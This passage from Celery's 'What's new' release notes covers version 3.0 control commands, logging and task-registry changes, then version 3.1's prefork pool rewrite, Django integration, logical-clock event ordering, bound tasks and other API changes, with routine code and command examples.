:control:`add_consumer`/:control:`cancel_consumer` Tells workers to consume from a new queue, or cancel consuming from a queue. This command has also been changed so that the worker remembers the queues added, so that the change will persist even if the connection is re-connected. These commands are available programmatically as :meth:`@control.add_consumer` / :meth:`@control.cancel_consumer`: .. code-block:: pycon >>> celery.control.add_consumer(queue_name, ... destination=['w1.example.com']) >>> celery.control.cancel_consumer(queue_name, ... destination=['w1.example.com']) or using the :program:`celery control` command: .. 
  .. code-block:: console

      $ celery control -d w1.example.com add_consumer queue
      $ celery control -d w1.example.com cancel_consumer queue

  .. note::

      Remember that a control command without *destination* will be sent to **all workers**.

- :control:`autoscale`

  Tells workers with ``--autoscale`` enabled to change autoscale max/min concurrency settings.

  This command is available programmatically as :meth:`@control.autoscale`:

  .. code-block:: pycon

      >>> celery.control.autoscale(max=10, min=5,
      ...     destination=['w1.example.com'])

  or using the :program:`celery control` command:

  .. code-block:: console

      $ celery control -d w1.example.com autoscale 10 5

- :control:`pool_grow`/:control:`pool_shrink`

  Tells workers to add or remove pool processes.

  These commands are available programmatically as :meth:`@control.pool_grow` / :meth:`@control.pool_shrink`:

  .. code-block:: pycon

      >>> celery.control.pool_grow(2, destination=['w1.example.com'])
      >>> celery.control.pool_shrink(2, destination=['w1.example.com'])

  or using the :program:`celery control` command:

  .. code-block:: console

      $ celery control -d w1.example.com pool_grow 2
      $ celery control -d w1.example.com pool_shrink 2

- :program:`celery control` now supports :control:`rate_limit` and :control:`time_limit` commands.

  See ``celery control --help`` for details.

Crontab now supports Day of Month, and Month of Year arguments
--------------------------------------------------------------

See the updated list of examples at :ref:`beat-crontab`.

Immutable subtasks
------------------

Subtasks can now be immutable, which means that the arguments won't be modified when calling callbacks:

.. code-block:: pycon

    >>> chain(add.s(2, 2), clear_static_electricity.si())

means it'll not receive the argument of the parent task, and ``.si()`` is a shortcut to:

.. code-block:: pycon

    >>> clear_static_electricity.subtask(immutable=True)

Logging Improvements
--------------------

Logging support now conforms better with best practices.

- Classes used by the worker no longer use ``app.get_default_logger``, but instead use `celery.utils.log.get_logger`, which simply gets the logger without setting the level, and adds a ``NullHandler``.

- Loggers are no longer passed around, instead every module using logging defines a module global logger that's used throughout.

- All loggers inherit from a common logger called "celery".

- Before ``task.get_logger`` would setup a new logger for every task, and even set the log level.  This is no longer the case.

- Instead all task loggers now inherit from a common "celery.task" logger that's set up when programs call `setup_logging_subsystem`.

- Instead of using LoggerAdapter to augment the formatter with the task_id and task_name fields, the task base logger now uses a special formatter adding these values at run-time from the currently executing task.

- In fact, ``task.get_logger`` is no longer recommended, it is better to add a module-level logger to your tasks module.

  For example, like this:

  .. code-block:: python

      from celery.utils.log import get_task_logger

      logger = get_task_logger(__name__)

      @celery.task
      def add(x, y):
          logger.debug('Adding %r + %r' % (x, y))
          return x + y

  The resulting logger will then inherit from the ``"celery.task"`` logger so that the current task name and id is included in logging output.

- Redirected output from stdout/stderr is now logged to a "celery.redirected" logger.

- In addition a few ``warnings.warn`` calls have been replaced with ``logger.warn``.

- Now avoids the 'no handlers for logger multiprocessing' warning.
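Because everything rolls up to the shared "celery" logger, extra logging only needs to touch one logger.  The following is a minimal sketch, assuming an arbitrary log file path and format string:

.. code-block:: python

    import logging

    # Loggers used by the worker, and the task loggers created with
    # get_task_logger(), all propagate up to the common "celery" logger,
    # so a single handler attached here sees every record.
    base_logger = logging.getLogger('celery')

    handler = logging.FileHandler('/var/log/celery/worker.log')  # assumed path
    handler.setFormatter(logging.Formatter(
        '[%(asctime)s: %(levelname)s] %(name)s: %(message)s'))
    base_logger.addHandler(handler)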
Task registry no longer global
------------------------------

Every Celery instance now has its own task registry.

You can make apps share registries by specifying it:

.. code-block:: pycon

    >>> app1 = Celery()
    >>> app2 = Celery(tasks=app1.tasks)

Note that tasks are shared between registries by default, so that tasks will be added to every subsequently created task registry.
As an alternative tasks can be private to specific task registries by setting the ``shared`` argument to the ``@task`` decorator:

.. code-block:: python

    @celery.task(shared=False)
    def add(x, y):
        return x + y

Abstract tasks are now lazily bound
-----------------------------------

The :class:`~celery.task.Task` class is no longer bound to an app by default, it will first be bound (and configured) when a concrete subclass is created.

This means that you can safely import and make task base classes, without also initializing the app environment:

.. code-block:: python

    from celery.task import Task

    class DebugTask(Task):
        abstract = True

        def __call__(self, *args, **kwargs):
            print('CALLING %r' % (self,))
            return self.run(*args, **kwargs)

.. code-block:: pycon

    >>> DebugTask
    <unbound DebugTask>

    >>> @celery1.task(base=DebugTask)
    ... def add(x, y):
    ...     return x + y
    >>> add.__class__
    <class add of <Celery default:0x101510d10>>

Lazy task decorators
--------------------

The ``@task`` decorator is now lazy when used with custom apps.

That is, if ``accept_magic_kwargs`` is enabled (hereby called "compat mode"), the task decorator executes inline like before, however for custom apps the @task decorator now returns a special PromiseProxy object that's only evaluated on access.

All promises will be evaluated when :meth:`@finalize` is called, or implicitly when the task registry is first used.

Smart `--app` option
--------------------

The :option:`--app <celery --app>` option now 'auto-detects':

- If the provided path is a module it tries to get an attribute named 'celery'.

- If the provided path is a package it tries to import a submodule named 'celery', and get the celery attribute from that module.

For example, if you have a project named ``proj`` where the celery app is located in ``from proj.celery import app``, then the following will be equivalent:

.. code-block:: console

    $ celery worker --app=proj
    $ celery worker --app=proj.celery:
    $ celery worker --app=proj.celery:app

In Other News
-------------

- New :setting:`CELERYD_WORKER_LOST_WAIT` to control the timeout in seconds before :exc:`billiard.WorkerLostError` is raised when a worker can't be signaled (Issue #595).

  Contributed by Brendon Crawford.

- Redis event monitor queues are now automatically deleted (Issue #436).

- App instance factory methods have been converted to be cached descriptors that create a new subclass on access.

  For example, this means that ``app.Worker`` is an actual class and will work as expected when:

  .. code-block:: python

      class Worker(app.Worker):
          ...

- New signal: :signal:`task_success`.

- Multiprocessing logs are now only emitted if the :envvar:`MP_LOG` environment variable is set.

- The Celery instance can now be created with a broker URL:

  .. code-block:: python

      app = Celery(broker='redis://')

- Result backends can now be set using a URL.

  Currently only supported by redis.  Example use:

  .. code-block:: python

      CELERY_RESULT_BACKEND = 'redis://localhost/1'

- Heartbeat frequency is now every 5s, and the frequency is sent with the event.

  The heartbeat frequency is now available in the worker event messages, so that clients can decide when to consider workers offline based on this value.
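  As an illustrative sketch (the ``freq`` field name, broker URL, and capture limit below are assumptions), a monitor could read the advertised frequency straight from the ``worker-heartbeat`` events:

  .. code-block:: python

      from celery import Celery

      app = Celery(broker='amqp://')

      def on_worker_heartbeat(event):
          # 'freq' is how often the worker says it will send heartbeats,
          # so a monitor can treat a worker as offline after missing a few.
          print('%s beats every %s seconds' % (
              event['hostname'], event.get('freq')))

      with app.connection() as connection:
          recv = app.events.Receiver(connection, handlers={
              'worker-heartbeat': on_worker_heartbeat,
          })
          recv.capture(limit=10)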
- Module celery.actors has been removed, and will be part of cl instead.

- Introduces new ``celery`` command, which is an entry-point for all other commands.

  The main program for this command can be run by calling ``celery.start()``.

- Annotations now supports decorators if the key starts with '@'.

  For example:

  .. code-block:: python

      from functools import wraps

      def debug_args(fun):

          @wraps(fun)
          def _inner(*args, **kwargs):
              print('ARGS: %r' % (args,))
              return fun(*args, **kwargs)
          return _inner

      CELERY_ANNOTATIONS = {
          'tasks.add': {'@__call__': debug_args},
      }

  Also tasks are now always bound by class so that annotated methods end up being bound.

- Bug-report now available as a command and broadcast command.

  - Get it from a Python REPL:

    .. code-block:: pycon

        >>> import celery
        >>> print(celery.bugreport())

  - Using the ``celery`` command line program:

    .. code-block:: console

        $ celery report

  - Get it from remote workers:

    .. code-block:: console

        $ celery inspect report

- Module ``celery.log`` moved to :mod:`celery.app.log`.

- Module ``celery.task.control`` moved to :mod:`celery.app.control`.

- New signal: :signal:`task_revoked`.

  Sent in the main process when the task is revoked or terminated.

- ``AsyncResult.task_id`` renamed to ``AsyncResult.id``.

- ``TasksetResult.taskset_id`` renamed to ``.id``.

- ``xmap(task, sequence)`` and ``xstarmap(task, sequence)``

  Returns a list of the results of applying the task function to every item in the sequence.

  Example:

  .. code-block:: pycon

      >>> from celery import xstarmap

      >>> xstarmap(add, zip(range(10), range(10))).apply_async()
      [0, 2, 4, 6, 8, 10, 12, 14, 16, 18]

- ``chunks(task, sequence, chunksize)``

- ``group.skew(start=, stop=, step=)``

  Skew will skew the countdown for the individual tasks in a group -- for example with this group:

  .. code-block:: pycon

      >>> g = group(add.s(i, i) for i in xrange(10))

  Skewing the tasks from 0 seconds to 10 seconds:

  .. code-block:: pycon

      >>> g.skew(stop=10)

  Will have the first task execute in 0 seconds, the second in 1 second, the third in 2 seconds and so on.

- 99% test coverage.

- :setting:`CELERY_QUEUES` can now be a list/tuple of :class:`~kombu.Queue` instances.

  Internally :attr:`@amqp.queues` is now a mapping of name/Queue instances, instead of converting on the fly.

- Can now specify connection for :class:`@control.inspect`.

  .. code-block:: python

      from kombu import Connection

      i = celery.control.inspect(connection=Connection('redis://'))
      i.active_queues()

- :setting:`CELERY_FORCE_EXECV` is now enabled by default.

  If the old behavior is wanted the setting can be set to False, or the new `--no-execv` option to :program:`celery worker`.

- Deprecated module ``celery.conf`` has been removed.

- The :setting:`CELERY_TIMEZONE` setting now always requires the :pypi:`pytz` library to be installed (except if the timezone is set to `UTC`).

- The Tokyo Tyrant backend has been removed and is no longer supported.

- Now uses :func:`~kombu.common.maybe_declare` to cache queue declarations.

- There's no longer a global default for the :setting:`CELERYBEAT_MAX_LOOP_INTERVAL` setting, it is instead set by individual schedulers.

- Worker: now truncates very long message bodies in error reports.

- No longer deep-copies exceptions when trying to serialize errors.

- The :envvar:`CELERY_BENCH` environment variable will now also list memory usage statistics at worker shutdown.

- Worker: now only ever uses a single timer for all timing needs, and instead sets different priorities.

- An exception's arguments are now safely pickled.

  Contributed by Matt Long.

- Worker/Beat no longer logs the start-up banner.
  Previously it would be logged with severity warning, now it's only written to stdout.

- The ``contrib/`` directory in the distribution has been renamed to ``extra/``.

- :mod:`celery.contrib.migrate`: Many improvements, including: filtering, queue migration, and support for acking messages on the broker it's migrating from.

  Contributed by John Watson.

- Worker: Prefetch count increments are now optimized and grouped together.

- Worker: No longer calls ``consume`` on the remote control command queue twice.

  Probably didn't cause any problems, but was unnecessary.

Internals
---------

- ``app.broker_connection`` is now ``app.connection``.

  Both names still work.

- Compatibility modules are now generated dynamically upon use.

  These modules are ``celery.messaging``, ``celery.log``, ``celery.decorators`` and ``celery.registry``.

- :mod:`celery.utils` refactored into multiple modules:

  - :mod:`celery.utils.text`
  - :mod:`celery.utils.imports`
  - :mod:`celery.utils.functional`

- Now using :mod:`kombu.utils.encoding` instead of :mod:`celery.utils.encoding`.

- Renamed module ``celery.routes`` -> :mod:`celery.app.routes`.

- Renamed package ``celery.db`` -> :mod:`celery.backends.database`.

- Renamed module ``celery.abstract`` -> :mod:`celery.worker.bootsteps`.

- Command line docs are now parsed from the module docstrings.

- Test suite directory has been reorganized.

- :program:`setup.py` now reads docs from the :file:`requirements/` directory.

- Celery commands no longer wraps output (Issue #700).

  Contributed by Thomas Johansson.

.. _v300-experimental:

Experimental
============

:mod:`celery.contrib.methods`: Task decorator for methods
------------------------------------------------------------

This is an experimental module containing a task decorator, and a task decorator filter, that can be used to create tasks out of methods::

    from celery.contrib.methods import task_method

    class Counter(object):

        def __init__(self):
            self.value = 1

        @celery.task(name='Counter.increment', filter=task_method)
        def increment(self, n=1):
            self.value += n
            return self.value

See :mod:`celery.contrib.methods` for more information.

.. _v300-unscheduled-removals:

Unscheduled Removals
====================

Usually we don't make backward incompatible removals, but these removals should have no major effect.

- The following settings have been renamed:

  - ``CELERYD_ETA_SCHEDULER`` -> ``CELERYD_TIMER``
  - ``CELERYD_ETA_SCHEDULER_PRECISION`` -> ``CELERYD_TIMER_PRECISION``

.. _v300-deprecations:

Deprecation Time-line Changes
=============================

See the :ref:`deprecation-timeline`.

- The ``celery.backends.pyredis`` compat module has been removed.

  Use :mod:`celery.backends.redis` instead!

- The following undocumented APIs have been moved:

  - ``control.inspect.add_consumer`` -> :meth:`@control.add_consumer`.
  - ``control.inspect.cancel_consumer`` -> :meth:`@control.cancel_consumer`.
  - ``control.inspect.enable_events`` -> :meth:`@control.enable_events`.
  - ``control.inspect.disable_events`` -> :meth:`@control.disable_events`.

  This way ``inspect()`` is only used for commands that don't modify anything, while idempotent control commands that make changes are on the control objects.

Fixes
=====

- Retry SQLAlchemy backend operations on DatabaseError/OperationalError (Issue #634)

- Tasks that called ``retry`` weren't acknowledged if acks late was enabled.

  Fix contributed by David Markey.

- The message priority argument wasn't properly propagated to Kombu (Issue #708).

  Fix contributed by Eran Rundstein.
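  As a quick sketch of how the option is used when calling a task (the task, queue name, and values here are assumptions), a priority is simply passed as a calling option, which the Redis transport maps onto the ``priority_steps`` buckets described earlier:

  .. code-block:: python

      # 0 is the default and highest priority on the Redis transport.
      add.apply_async((2, 2), queue='default', priority=0)

      # a lower-priority call of the same task:
      add.apply_async((2, 2), queue='default', priority=6)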
.. _whatsnew-3.1:

===========================================
 What's new in Celery 3.1 (Cipater)
===========================================

:Author: Ask Solem (``ask at celeryproject.org``)

.. sidebar:: Change history

    What's new documents describe the changes in major versions, we also have a :ref:`changelog` that lists the changes in bugfix releases (0.0.x), while older series are archived under the :ref:`history` section.

Celery is a simple, flexible, and reliable distributed system to process vast amounts of messages, while providing operations with the tools required to maintain such a system.

It's a task queue with focus on real-time processing, while also supporting task scheduling.

Celery has a large and diverse community of users and contributors, you should come join us :ref:`on IRC <irc-channel>` or :ref:`our mailing-list <mailing-list>`.

To read more about Celery you should go read the :ref:`introduction <intro>`.

While this version is backward compatible with previous versions it's important that you read the following section.

This version is officially supported on CPython 2.6, 2.7, and 3.3, and also supported on PyPy.

.. _`website`: http://celeryproject.org/

.. topic:: Table of Contents

    Make sure you read the important notes before upgrading to this version.

.. contents::
    :local:
    :depth: 2

Preface
=======

Deadlocks have long plagued our workers, and while uncommon they're not acceptable.  They're also infamous for being extremely hard to diagnose and reproduce, so to make this job easier I wrote a stress test suite that bombards the worker with different tasks in an attempt to break it.

What happens if thousands of worker child processes are killed every second?  What if we also kill the broker connection every 10 seconds?  These are examples of what the stress test suite will do to the worker, and it reruns these tests using different configuration combinations to find edge case bugs.

The end result was that I had to rewrite the prefork pool to avoid the use of the POSIX semaphore.  This was extremely challenging, but after months of hard work the worker now finally passes the stress test suite.

There are probably more bugs to find, but the good news is that we now have a tool to reproduce them, so should you be so unlucky to experience a bug then we'll write a test for it and squash it!

Note that I've also moved many broker transports into experimental status: the only transports recommended for production use today are RabbitMQ and Redis.

I don't have the resources to maintain all of them, so bugs are left unresolved.  I wish that someone would step up and take responsibility for these transports or donate resources to improve them, but as the situation is now I don't think the quality is up to par with the rest of the code-base so I cannot recommend them for production use.

The next version of Celery, 4.0, will focus on performance and removing rarely used parts of the library.  Work has also started on a new message protocol, supporting multiple languages and more.  The initial draft can be found :ref:`here <message-protocol-task-v2>`.

This has probably been the hardest release I've worked on, so no introduction to this changelog would be complete without a massive thank you to everyone who contributed and helped me test it!

Thank you for your support!

*— Ask Solem*

..
_v310-important: Important Notes =============== Dropped support for Python 2.5 ------------------------------ Celery now requires Python 2.6 or later. The new dual code base runs on both Python 2 and 3, without requiring the ``2to3`` porting tool. .. note:: This is also the last version to support Python 2.6! From Celery 4.0 and on-wards Python 2.7 or later will be required. .. _last-version-to-enable-pickle: Last version to enable Pickle by default ---------------------------------------- Starting from Celery 4.0 the default serializer will be json. If you depend on pickle being accepted you should be prepared for this change by explicitly allowing your worker to consume pickled messages using the :setting:`CELERY_ACCEPT_CONTENT` setting: .. code-block:: python CELERY_ACCEPT_CONTENT = ['pickle', 'json', 'msgpack', 'yaml'] Make sure you only select the serialization formats you'll actually be using, and make sure you've properly secured your broker from unwanted access (see the :ref:`Security Guide `). The worker will emit a deprecation warning if you don't define this setting. .. topic:: for Kombu users Kombu 3.0 no longer accepts pickled messages by default, so if you use Kombu directly then you have to configure your consumers: see the :ref:`Kombu 3.0 Changelog ` for more information. Old command-line programs removed and deprecated ------------------------------------------------ Everyone should move to the new :program:`celery` umbrella command, so we're incrementally deprecating the old command names. In this version we've removed all commands that aren't used in init-scripts. The rest will be removed in 4.0. +-------------------+--------------+-------------------------------------+ | Program | New Status | Replacement | +===================+==============+=====================================+ | ``celeryd`` | *DEPRECATED* | :program:`celery worker` | +-------------------+--------------+-------------------------------------+ | ``celerybeat`` | *DEPRECATED* | :program:`celery beat` | +-------------------+--------------+-------------------------------------+ | ``celeryd-multi`` | *DEPRECATED* | :program:`celery multi` | +-------------------+--------------+-------------------------------------+ | ``celeryctl`` | **REMOVED** | :program:`celery inspect|control` | +-------------------+--------------+-------------------------------------+ | ``celeryev`` | **REMOVED** | :program:`celery events` | +-------------------+--------------+-------------------------------------+ | ``camqadm`` | **REMOVED** | :program:`celery amqp` | +-------------------+--------------+-------------------------------------+ If this isn't a new installation then you may want to remove the old commands: .. code-block:: console $ pip uninstall celery $ # repeat until it fails # ... $ pip uninstall celery $ pip install celery Please run :program:`celery --help` for help using the umbrella command. .. _v310-news: News ==== Prefork Pool Improvements ------------------------- These improvements are only active if you use an async capable transport. This means only RabbitMQ (AMQP) and Redis are supported at this point and other transports will still use the thread-based fallback implementation. - Pool is now using one IPC queue per child process. Previously the pool shared one queue between all child processes, using a POSIX semaphore as a mutex to achieve exclusive read and write access. The POSIX semaphore has now been removed and each child process gets a dedicated queue. 
This means that the worker will require more file descriptors (two descriptors per process), but it also means that performance is improved and we can send work to individual child processes. POSIX semaphores aren't released when a process is killed, so killing processes could lead to a deadlock if it happened while the semaphore was acquired. There's no good solution to fix this, so the best option was to remove the semaphore. - Asynchronous write operations The pool now uses async I/O to send work to the child processes. - Lost process detection is now immediate. If a child process is killed or exits mysteriously the pool previously had to wait for 30 seconds before marking the task with a :exc:`~celery.exceptions.WorkerLostError`. It had to do this because the out-queue was shared between all processes, and the pool couldn't be certain whether the process completed the task or not. So an arbitrary timeout of 30 seconds was chosen, as it was believed that the out-queue would've been drained by this point. This timeout is no longer necessary, and so the task can be marked as failed as soon as the pool gets the notification that the process exited. - Rare race conditions fixed Most of these bugs were never reported to us, but were discovered while running the new stress test suite. Caveats ~~~~~~~ .. topic:: Long running tasks The new pool will send tasks to a child process as long as the process in-queue is writable, and since the socket is buffered this means that the processes are, in effect, prefetching tasks. This benefits performance but it also means that other tasks may be stuck waiting for a long running task to complete:: -> send T1 to Process A # A executes T1 -> send T2 to Process B # B executes T2 <- T2 complete -> send T3 to Process A # A still executing T1, T3 stuck in local buffer and # won't start until T1 returns The buffer size varies based on the operating system: some may have a buffer as small as 64KB but on recent Linux versions the buffer size is 1MB (can only be changed system wide). You can disable this prefetching behavior by enabling the :option:`-Ofair ` worker option: .. code-block:: console $ celery -A proj worker -l info -Ofair With this option enabled the worker will only write to workers that are available for work, disabling the prefetch behavior. .. topic:: Max tasks per child If a process exits and pool prefetch is enabled the worker may have already written many tasks to the process in-queue, and these tasks must then be moved back and rewritten to a new process. This is very expensive if you have the :option:`--max-tasks-per-child ` option set to a low value (e.g., less than 10), you should not be using the :option:`-Ofast ` scheduler option. Django supported out of the box ------------------------------- Celery 3.0 introduced a shiny new API, but unfortunately didn't have a solution for Django users. The situation changes with this version as Django is now supported in core and new Django users coming to Celery are now expected to use the new API directly. The Django community has a convention where there's a separate ``django-x`` package for every library, acting like a bridge between Django and the library. Having a separate project for Django users has been a pain for Celery, with multiple issue trackers and multiple documentation sources, and then lastly since 3.0 we even had different APIs. With this version we challenge that convention and Django users will use the same library, the same API and the same documentation as everyone else. 
There's no rush to port your existing code to use the new API, but if you'd like to experiment with it you should know that: - You need to use a Celery application instance. The new Celery API introduced in 3.0 requires users to instantiate the library by creating an application: .. code-block:: python from celery import Celery app = Celery() - You need to explicitly integrate Celery with Django Celery won't automatically use the Django settings, so you can either configure Celery separately or you can tell it to use the Django settings with: .. code-block:: python app.config_from_object('django.conf:settings') Neither will it automatically traverse your installed apps to find task modules. If you want this behavior, you must explicitly pass a list of Django instances to the Celery app: .. code-block:: python from django.conf import settings app.autodiscover_tasks(lambda: settings.INSTALLED_APPS) - You no longer use ``manage.py`` Instead you use the :program:`celery` command directly: .. code-block:: console $ celery -A proj worker -l info For this to work your app module must store the :envvar:`DJANGO_SETTINGS_MODULE` environment variable, see the example in the :ref:`Django guide `. To get started with the new API you should first read the :ref:`first-steps` tutorial, and then you should read the Django-specific instructions in :ref:`django-first-steps`. The fixes and improvements applied by the :pypi:`django-celery` library are now automatically applied by core Celery when it detects that the :envvar:`DJANGO_SETTINGS_MODULE` environment variable is set. The distribution ships with a new example project using Django in :file:`examples/django`: https://github.com/celery/celery/tree/3.1/examples/django Some features still require the :pypi:`django-celery` library: - Celery doesn't implement the Django database or cache result backends. - Celery doesn't ship with the database-based periodic task scheduler. .. note:: If you're still using the old API when you upgrade to Celery 3.1 then you must make sure that your settings module contains the ``djcelery.setup_loader()`` line, since this will no longer happen as a side-effect of importing the :pypi:`django-celery` module. New users (or if you've ported to the new API) don't need the ``setup_loader`` line anymore, and must make sure to remove it. Events are now ordered using logical time ----------------------------------------- Keeping physical clocks in perfect sync is impossible, so using time-stamps to order events in a distributed system isn't reliable. Celery event messages have included a logical clock value for some time, but starting with this version that field is also used to order them. Also, events now record timezone information by including a new ``utcoffset`` field in the event message. This is a signed integer telling the difference from UTC time in hours, so for example, an event sent from the Europe/London timezone in daylight savings time will have an offset of 1. :class:`@events.Receiver` will automatically convert the time-stamps to the local timezone. .. note:: The logical clock is synchronized with other nodes in the same cluster (neighbors), so this means that the logical epoch will start at the point when the first worker in the cluster starts. If all of the workers are shutdown the clock value will be lost and reset to 0. To protect against this, you should specify the :option:`celery worker --statedb` option such that the worker can persist the clock value at shutdown. 
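For example, a minimal worker command line (the project name and state file path below are arbitrary):

.. code-block:: console

    $ celery -A proj worker -l info --statedb=/var/run/celery/worker.state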
You may notice that the logical clock is an integer value and increases very rapidly. Don't worry about the value overflowing though, as even in the most busy clusters it may take several millennium before the clock exceeds a 64 bits value. New worker node name format (``name@host``) ------------------------------------------- Node names are now constructed by two elements: name and host-name separated by '@'. This change was made to more easily identify multiple instances running on the same machine. If a custom name isn't specified then the worker will use the name 'celery' by default, resulting in a fully qualified node name of 'celery@hostname': .. code-block:: console $ celery worker -n example.com celery@example.com To also set the name you must include the @: .. code-block:: console $ celery worker -n worker1@example.com worker1@example.com The worker will identify itself using the fully qualified node name in events and broadcast messages, so where before a worker would identify itself as 'worker1.example.com', it'll now use 'celery@worker1.example.com'. Remember that the :option:`-n ` argument also supports simple variable substitutions, so if the current host-name is *george.example.com* then the ``%h`` macro will expand into that: .. code-block:: console $ celery worker -n worker1@%h worker1@george.example.com The available substitutions are as follows: +---------------+----------------------------------------+ | Variable | Substitution | +===============+========================================+ | ``%h`` | Full host-name (including domain name) | +---------------+----------------------------------------+ | ``%d`` | Domain name only | +---------------+----------------------------------------+ | ``%n`` | Host-name only (without domain name) | +---------------+----------------------------------------+ | ``%%`` | The character ``%`` | +---------------+----------------------------------------+ Bound tasks ----------- The task decorator can now create "bound tasks", which means that the task will receive the ``self`` argument. .. code-block:: python @app.task(bind=True) def send_twitter_status(self, oauth, tweet): try: twitter = Twitter(oauth) twitter.update_status(tweet) except (Twitter.FailWhaleError, Twitter.LoginError) as exc: raise self.retry(exc=exc) Using *bound tasks* is now the recommended approach whenever you need access to the task instance or request context. Previously one would've to refer to the name of the task instead (``send_twitter_status.retry``), but this could lead to problems in some configurations. Mingle: Worker synchronization ------------------------------ The worker will now attempt to synchronize with other workers in the same cluster. Synchronized data currently includes revoked tasks and logical clock. This only happens at start-up and causes a one second start-up delay to collect broadcast responses from other workers. You can disable this bootstep using the :option:`celery worker --without-mingle` option. Gossip: Worker <-> Worker communication --------------------------------------- Workers are now passively subscribing to worker related events like heartbeats. This means that a worker knows what other workers are doing and can detect if they go offline. Currently this is only used for clock synchronization, but there are many possibilities for future additions and you can write extensions that take advantage of this already. 
Some ideas include consensus protocols, reroute task to best worker (based on resource usage or data locality) or restarting workers when they crash. We believe that although this is a small addition, it opens amazing possibilities. You can disable this bootstep using the :option:`celery worker --without-gossip` option. Bootsteps: Extending the worker ------------------------------- By writing bootsteps you can now easily extend the consumer part of the worker to add additional features, like custom message consumers. The worker has been using bootsteps for some time, but these were never documented. In this version the consumer part of the worker has also been rewritten to use bootsteps and the new :ref:`guide-extending` guide documents examples extending the worker, including adding custom message consumers. See the :ref:`guide-extending` guide for more information. .. note:: Bootsteps written for older versions won't be compatible with this version, as the API has changed significantly. The old API was experimental and internal but should you be so unlucky to use it then please contact the mailing-list and we'll help you port the bootstep to the new API. New RPC result backend ---------------------- This new experimental version of the ``amqp`` result backend is a good alternative to use in classical RPC scenarios, where the process that initiates the task is always the process to retrieve the result. It uses Kombu to send and retrieve results, and each client uses a unique queue for replies to be sent to. This avoids the significant overhead of the original amqp result backend which creates one queue per task. By default results sent using this backend won't persist, so they won't survive a broker restart. You can enable the :setting:`CELERY_RESULT_PERSISTENT` setting to change that. .. code-block:: python CELERY_RESULT_BACKEND = 'rpc' CELERY_RESULT_PERSISTENT = True Note that chords are currently not supported by the RPC backend. Time limits can now be set by the client ---------------------------------------- Two new options have been added to the Calling API: ``time_limit`` and ``soft_time_limit``: .. code-block:: pycon >>> res = add.apply_async((2, 2), time_limit=10, soft_time_limit=8) >>> res = add.subtask((2, 2), time_limit=10, soft_time_limit=8).delay() >>> res = add.s(2, 2).set(time_limit=10, soft_time_limit=8).delay() Contributed by Mher Movsisyan. Redis: Broadcast messages and virtual hosts ------------------------------------------- Broadcast messages are currently seen by all virtual hosts when using the Redis transport. You can now fix this by enabling a prefix to all channels so that the messages are separated: .. code-block:: python BROKER_TRANSPORT_OPTIONS = {'fanout_prefix': True} Note that you'll not be able to communicate with workers running older versions or workers that doesn't have this setting enabled. This setting will be the default in a future version. Related to Issue #1490. :pypi:`pytz` replaces :pypi:`python-dateutil` dependency -------------------------------------------------------- Celery no longer depends on the :pypi:`python-dateutil` library, but instead a new dependency on the :pypi:`pytz` library was added. The :pypi:`pytz` library was already recommended for accurate timezone support. This also means that dependencies are the same for both Python 2 and Python 3, and that the :file:`requirements/default-py3k.txt` file has been removed. 
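As a small configuration sketch (the zone name is just an example), accurate local-time handling only needs :pypi:`pytz` installed and a timezone setting:

.. code-block:: python

    CELERY_ENABLE_UTC = True           # keep internal timestamps in UTC
    CELERY_TIMEZONE = 'Europe/London'  # converted using pytz zone data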
Support for :pypi:`setuptools` extra requirements ------------------------------------------------- Pip now supports the :pypi:`setuptools` extra requirements format, so we've removed the old bundles concept, and instead specify setuptools extras. You install extras by specifying them inside brackets: .. code-block:: console $ pip install celery[redis,mongodb] The above will install the dependencies for Redis and MongoDB. You can list as many extras as you want. .. warning:: You can't use the ``celery-with-*`` packages anymore, as these won't be updated to use Celery 3.1. +-------------+-------------------------+---------------------------+ | Extension | Requirement entry | Type | +=============+=========================+===========================+ | Redis | ``celery[redis]`` | transport, result backend | +-------------+-------------------------+---------------------------+ | MongoDB | ``celery[mongodb]`` | transport, result backend | +-------------+-------------------------+---------------------------+ | CouchDB | ``celery[couchdb]`` | transport | +-------------+-------------------------+---------------------------+ | Beanstalk | ``celery[beanstalk]`` | transport | +-------------+-------------------------+---------------------------+ | ZeroMQ | ``celery[zeromq]`` | transport | +-------------+-------------------------+---------------------------+ | Zookeeper | ``celery[zookeeper]`` | transport | +-------------+-------------------------+---------------------------+ | SQLAlchemy | ``celery[sqlalchemy]`` | transport, result backend | +-------------+-------------------------+---------------------------+ | librabbitmq | ``celery[librabbitmq]`` | transport (C amqp client) | +-------------+-------------------------+---------------------------+ The complete list with examples is found in the :ref:`bundles` section. ``subtask.__call__()`` now executes the task directly ----------------------------------------------------- A misunderstanding led to ``Signature.__call__`` being an alias of ``.delay`` but this doesn't conform to the calling API of ``Task`` which calls the underlying task method. This means that: .. code-block:: python @app.task def add(x, y): return x + y add.s(2, 2)() now does the same as calling the task directly: .. code-block:: pycon >>> add(2, 2) In Other News ------------- - Now depends on :ref:`Kombu 3.0 `. - Now depends on :pypi:`billiard` version 3.3. - Worker will now crash if running as the root user with pickle enabled. - Canvas: ``group.apply_async`` and ``chain.apply_async`` no longer starts separate task. That the group and chord primitives supported the "calling API" like other subtasks was a nice idea, but it was useless in practice and often confused users. If you still want this behavior you can define a task to do it for you. - New method ``Signature.freeze()`` can be used to "finalize" signatures/subtask. Regular signature: .. code-block:: pycon >>> s = add.s(2, 2) >>> result = s.freeze() >>> result >>> s.delay() Group: .. code-block:: pycon >>> g = group(add.s(2, 2), add.s(4, 4)) >>> result = g.freeze() >>> g() - Chord exception behavior defined (Issue #1172). From this version the chord callback will change state to FAILURE when a task part of a chord raises an exception. See more at :ref:`chord-errors`. - New ability to specify additional command line options to the worker and beat programs. The :attr:`@user_options` attribute can be used to add additional command-line arguments, and expects :mod:`optparse`-style options: .. 
code-block:: python from celery import Celery from celery.bin import Option app = Celery() app.user_options['worker'].add( Option('--my-argument'), ) See the :ref:`guide-extending` guide for more information. - All events now include a ``pid`` field, which is the process id of the process that sent the event. - Event heartbeats are now calculated based on the time when the event was received by the monitor, and not the time reported by the worker. This means that a worker with an out-of-sync clock will no longer show as 'Offline' in monitors. A warning is now emitted if the difference between the senders time and the internal time is greater than 15 seconds, suggesting that the clocks are out of sync. - Monotonic clock support. A monotonic clock is now used for timeouts and scheduling. The monotonic clock function is built-in starting from Python 3.4, but we also have fallback implementations for Linux and macOS. - :program:`celery worker` now supports a new :option:`--detach ` argument to start the worker as a daemon in the background. - :class:`@events.Receiver` now sets a ``local_received`` field for incoming events, which is set to the time of when the event was received. - :class:`@events.Dispatcher` now accepts a ``groups`` argument which decides a white-list of event groups that'll be sent. The type of an event is a string separated by '-', where the part before the first '-' is the group. Currently there are only two 